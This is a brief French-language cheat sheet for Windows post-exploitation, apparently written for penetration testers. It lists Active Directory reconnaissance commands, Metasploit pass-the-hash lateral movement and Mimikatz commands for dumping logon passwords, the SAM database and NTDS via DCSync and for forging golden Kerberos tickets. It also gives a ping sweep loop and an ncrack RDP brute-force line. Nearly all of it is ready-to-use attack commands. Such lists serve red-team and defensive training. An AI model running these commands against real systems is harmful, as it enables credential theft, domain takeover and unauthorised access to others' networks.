Windows post exploitation cheat sheet

Quelques commandes pour la phase de post-exploitation.

I/ Reconnaissance

  • Get systeminfo :
systeminfo
  • Get network config :
ipconfig /all
  • Get user info :
whoami /all
  • Nltest :
nltest /dsgetdc:domain_name # Nom de la forêt
nltest /dclist:domain_name  # Liste des DC d'un domaine
nltest /domain_trusts       # Trusts entre domaine
  • WMIC :
wmic useraccount get name,sid # Liste les users + leur SID
  • Powershell :
Get-DomainTrust -NET # Domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
  • Get internal domains SID’s :
Metasploit : use scanner/smb/smb_lookupsid
RPC Cycling : rpcclient -U "" -N 
     rpcclient $> lsaquery

II/ Mouvement latéral :

  • Pass the hash :
Metasploit : exploit/windows/psexec
  • Null LM hash :
aad3b435b51404eeaad3b435b51404ee

III/ Priv esc

  • Mimikatz :
lsadump::trust /patch                                                 # domain trust keys/accounts
sekurlsa::logonpasswords                                              # get logon passwords
kerberos::list                                                        # list kerberos tickets in cache
kerberos::list /export                                                # exporte tickets int cache
kerberos::purge                                                       # purge cache
lsadump::dcsync /domain:domain_name /all                              # Drop ntds.dit
lsadump:sam                                                           # drop sam base
kerberos::golden /user:"" /domain:"" /krbtgt:"" /ticket: /sid:"" /ptt # forge a golden ticket (god mode tgt)

IV/ Autres :

  • Metasploit
use local_admin_search # Liste les machines ou un compte du domaine est admin local
  • Ping a range of IP from CMD :
FOR /L %i IN (1,1,10) DO ping -n 1 192.168.0.%i | FIND /i "Reply">> "répertoire_TEMP\ip.txt"
  • Bruteforce RDP :
ncrack -vv --user "username" --pass "password" "IP":"port"